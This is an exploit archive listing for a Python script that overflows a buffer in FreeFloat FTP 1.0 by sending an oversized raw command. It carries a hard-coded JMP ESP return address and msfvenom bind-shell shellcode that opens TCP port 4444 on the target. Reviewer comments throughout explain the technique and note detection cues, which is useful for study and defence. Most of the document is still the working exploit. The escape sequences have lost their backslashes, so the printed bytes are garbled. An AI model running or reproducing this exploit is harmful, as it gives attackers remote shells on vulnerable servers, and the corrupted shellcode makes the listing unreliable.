
# Title : FreeFloat FTP 1.0 Raw Commands Buffer Overflow
# Published : 2013-02-11
# Author :
# Previous Title : Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution
# Next Title : DataLife Engine preview.php PHP Code Injection


#!/usr/bin/env python

# Exploit Title: FreeFloat FTP raw commands buffer overflow
# Date: 10 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.freefloat.com/
# Version: FreeFloat FTP 1.0
# Tested on: Windows XP Pro SP2, English
#
# Description: 
# FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and 
# execute arbitrary code when a long and invalid raw command is sent to it. 
#

import socket, struct, sys

# Reviewer notes (defensive reading of this listing):
#   - This is a Python 2 script (print statements); it takes a target IP and
#     port, reads the server banner once, and sends a single oversized FTP
#     command built from filler bytes, a hard-coded return address, padding
#     and an msfvenom payload (see the assembly of `buf` below).
#   - The return address and the 251-byte EIP offset are specific to the
#     build named in the header (Windows XP Pro SP2, English, SHELL32.DLL);
#     the technique depends on that exact module layout.
#   - NOTE(review): the `\x..` escape sequences in this listing appear to have
#     lost their backslashes during extraction; as printed they are plain
#     ASCII text, so the byte counts in the comments refer to the intended
#     values, not to the strings as shown here.
#
# Argument handling: exactly two positional arguments are expected (target
# IP and TCP port); anything less prints usage and exits with status 0.
if len(sys.argv) < 3:
	print "usage: %s IP port" % (sys.argv[0])
	sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])  # ValueError (uncaught) on a non-numeric port

# Bind shellcode generated with msfvenom: 
#     msfvenom -p windows/shell_bind_tcp 
#         -b "x00x0ax0bx27x36xcexc1x04x14x3ax44xe0x42xa9x0d" 
#         -e x86/fnstenv_mov 
#
# [*] x86/fnstenv_mov succeeded with size 366 (iteration=1)
#
# Detection-relevant: per the msfvenom line above this is a bind-shell
# payload, and the print further down says it listens on TCP 4444 on the
# target. The bytes themselves are opaque in this listing; the payload
# size (366) is taken from the generator's own comment, not verified here.
shellcode = (
"x6ax56x59xd9xeexd9x74x24xf4x5bx81x73x13xc8" +
"x4cxabx8cx83xebxfcxe2xf4x34xa4x22x8cxc8x4c" +
"xcbx05x2dx7dx79xe8x43x1ex9bx07x9ax40x20xde" +
"xdcxc7xd9xa4xc7xfbxe1xaaxf9xb3x9ax4cx64x70" +
"xcaxf0xcax60x8bx4dx07x41xaax4bx2axbcxf9xdb" +
"x43x1exbbx07x8ax70xaax5cx43x0cxd3x09x08x38" +
"xe1x8dx18x1cx20xc4xd0xc7xf3xacxc9x9fx48xb0" +
"x81xc7x9fx07xc9x9ax9ax73xf9x8cx07x4dx07x41" +
"xaax4bxf0xacxdex78xcbx31x53xb7xb5x68xdex6e" +
"x90xc7xf3xa8xc9x9fxcdx07xc4x07x20xd4xd4x4d" +
"x78x07xccxc7xaax5cx41x08x8fxa8x93x17xcaxd5" +
"x92x1dx54x6cx90x13xf1x07xdaxa7x2dxd1xa0x7f" +
"x99x8cxc8x24xdcxffxfax13xffxe4x84x3bx8dx8b" +
"x37x99x13x1cxc9x4cxabxa5x0cx18xfbxe4xe1xcc" +
"xc0x8cx37x99xfbxdcx98x1cxebxdcx88x1cxc3x66" +
"xc7x93x4bx73x1dxc5x6cxbdx13x1fxc3x8exc8x5d" +
"xf7x05x2ex26xbbxdax9fx24x69x57xffx2bx54x59" +
"x9bx1bxc3x3bx21x74x54x73x1dx1fxf8xdbxa0x38" +
"x47xb7x29xb3x7exdbx41x8bxc3xf9xa6x01xcax73" +
"x1dx24xc8xe1xacx4cx22x6fx9fx1bxfcxbdx3ex26" +
"xb9xd5x9exaex56xeax0fx08x8fxb0xc9x4dx26xc8" +
"xecx5cx6dx8cx8cx18xfbxdax9ex1axedxdax86x1a" +
"xfdxdfx9ex24xd2x40xf7xcax54x59x41xacxe5xda" +
"x8exb3x9bxe4xc0xcbxb6xecx37x99x10x7cx7dxee" +
"xfdxe4x6exd9x16x11x37x99x97x8axb4x46x2bx77" +
"x28x39xaex37x8fx5fxd9xe3xa2x4cxf8x73x1dx4c" +
"xabx8c"
)

# EIP overwritten at offset 251
# JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English
#
# The 4-byte little-endian address is packed with struct so the order in
# memory matches the x86 stack layout. Because it is a fixed address inside
# a system DLL of one specific OS build, a different build (or an
# ASLR-enabled system, which relocates such modules) would not place this
# instruction at the same address — hedged, as the page only states the
# single tested configuration.
jmpesp = struct.pack("<I", 0x7CA58265) 
# Intended layout of the single command sent: 251 filler bytes, the 4-byte
# return address, 129 bytes of NOP-style padding, then the payload
# (366 bytes per the msfvenom comment) — roughly 750 bytes before the line
# terminator. From a detection standpoint that is one non-protocol FTP
# command far longer than any legitimate verb, sent immediately after the
# banner.
buf = "x41" * 251 + jmpesp + "x90" * 129 + shellcode

print "[+] exploiting target %s:%d" % (ip, port)
print "[+] try connecting to %s on port 4444" % (ip)

# Network interaction: one TCP connect, one banner read (up to 1024 bytes,
# discarded), one send. There is no error handling — a refused connection
# raises socket.error and terminates the script — and the socket is never
# closed explicitly; the process simply exits. send() may return after a
# partial write, which the script does not check (noted, not observed).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(1024)
s.send(buf + "rn")